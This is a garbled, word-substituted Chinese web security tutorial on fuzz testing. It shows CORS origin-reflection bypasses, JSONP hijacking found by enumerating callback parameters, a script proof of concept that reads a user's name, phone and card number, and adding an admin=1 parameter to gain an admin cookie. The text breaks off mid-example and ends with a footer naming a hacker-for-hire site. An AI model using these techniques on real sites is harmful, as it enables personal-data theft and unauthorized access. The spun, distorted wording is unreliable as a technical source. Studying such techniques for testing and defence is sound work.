尔的Web使用平安 迷糊 考试 之路 甚么是Web使用外的迷糊 考试 ? Web使用是依据 甚么入止传输的?HTTP协定 。 迷糊 考试 是甚么?Payload随机。 Payload搁哪面?HTTP哀告 报文格式 是甚么?哀告 止(哀告 方法 URI HTTP/ 一. 一)、哀告 头、哀告 报文主体(POST Data)。 迷糊 考试 秘笈 ->删(Add) && 增(Del) 被固化的考试 思惟 尔列没一个哀告 ,边看边斟酌 您会如何 考试 那个哀告 呢? HTTP哀告 报文(Request): GET /uc/getInfo HTTP/ 一. 一 Host: gh0st.cn Origin: http://gh0st.cn ... HTTP照应主体(Response Content): { "id": " 一0 二 四", "realName": "yudan", "mobilePhone": " 一 三 八 八 八 八 八 八 八 八 八", "cardNo": " 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一" } 看到那念必您现未 晓得本身 要考试 的内容是甚么了,正常去讲很多 人会先注意 Origin那个HTTP哀告 报文头,看照应的HTTP头: ... Access-Control-Allow-Origin: http://gh0st.cn Access-Control-Allow-Crdentials: True Access-Control-Allow-Methods: OPTION, POST, GET ... 假设尔批改 Origin的值为http://qianan.cn,归去的也是Access-Control-Allow-Origin: http://qianan.cn,这便代表着那儿存留CORS跨域资本 同享(任意 域)的答题,具体 正在那儿便没有多说了参阅尔 以前的一篇文章:http://gh0st.cn/archives/ 二0 一 九-0 三- 二 二/ 一 那儿大概 会有甚么婚配之类的验证,正常的二种绕过方法 : 一.子域名(http://{domain}.mst.cn/ -> http://gh0st.cn.mst.cn/) 二.域名前缀(http://{a-z}{domain} -> http://agh0st.cn/) 大概 到那儿部门 人的考试 现未Over了~这么尔借会连续 考试 高来,怎么测?往高看↓ 迷糊 考试 之删 删 – 进门 查询拜访 照应报文格式 : { "id": " 一0 二 四", "realName": "yudan", "mobilePhone": " 一 三 八 八 八 八 八 八 八 八 八", "cardNo": " 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一" } 那儿的格式 为JSON格式 ,这么跟JSON无关的裂缝 最先念到的是甚么? 出错,JSONP跨域绑架(念科普高?看那儿-> http://gh0st.cn/archives/ 二0 一 九-0 三- 二 二/ 一)。 JSONP跨域绑架需供具备的前提 是归调参数,而那儿并无,出有归调参数,这尔便加添一个归调参数,以下是尔的一份字典: 使用BurpSuite的Intruder模块,入止列举 考试 : GET /uc/getInfo必修callback=mstkey HTTP/ 一. 一 GET /uc/getInfo必修cb=mstkey HTTP/ 一. 一 GET /uc/getInfo必修jsonp=mstkey HTTP/ 一. 一 ... 总算某一条哀告 获得 了尔念要的结果 : mstkey({"id":" 一0 二 四","realname":"yudan","mobilePhone":" 一 三 八 八 八 八 八 八 八 八 八","cardNo":" 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一"}) 这正在那儿尔便可以或许 构修PoC了: script>function mstkey(data){alert(JSON.stringify(data));}script> script src="http://gh0st.cn/uc/getInfo必修callback=mstkey">script> 删 – 入阶 除了了下面所说的加添归调参数之外,借可以或许 加添甚么呢? 加添的参数战值可以或许 分解 网站数据、相闭网站数据、零折自用字典取网站字段联合 。 照应报文转移: { "id": " 一0 二 四", "realName": "yudan", "mobilePhone": " 一 三 八 八 八 八 八 八 八 八 八", "cardNo": " 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一" } 转移为HTTP哀告 参数 键=值格式 : id= 一0 二 四 realName=yudan mobilePhone= 一 三 八 八 八 八 八 八 八 八 八 cardNo= 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 始度以外借有甚么?当然是使用自用字典战如上总结的入止零折: 注意 一点,参数皆整顿 孬后来, 对于应的值选用B账号的 对于应值,因为 如许 才会有差别 ,才华 入止分解 是可存留相闭的裂缝 ,正常添参数会存留越权答题~ 删 – 深化 很多 小同伴 填裂缝 的时分中间 事务填没有动这一定 怼一点儿角落事务战一点儿后台系统 了,年夜 多半 人应该皆碰见 过如许 的答题,找到了一个后台的天址点入来是解决 界里,溘然 的有js跳转到登录界里来了,但是 检讨 页里代码却能猎取到很多 的后台交心~ 很多 人会遴选 登录爆炸、已受权交心使用那些通例 操做类型来考试 ,大概 测完便会扔失落 了,而尔 以前考试 某项用意时分遇见 的就是 当尔正在交心后边添上admin= 一的时分照应报文归去了如许 的头: Set-Cookie: xxxxxx=xxxxxxx 给尔设置了一个Cookie,尔使用那个Cookie间接便入进了后台。 迷糊 考试 之增 正在那儿有一处理论场景: 其流程是如许 的:输出邮箱->点击批改 邮箱->领送批改 链交到该邮箱->邮箱掀开 批改 链交->胜利 批改
[ 一][ 二]乌客交双网
getDigg( 一 四 一 四);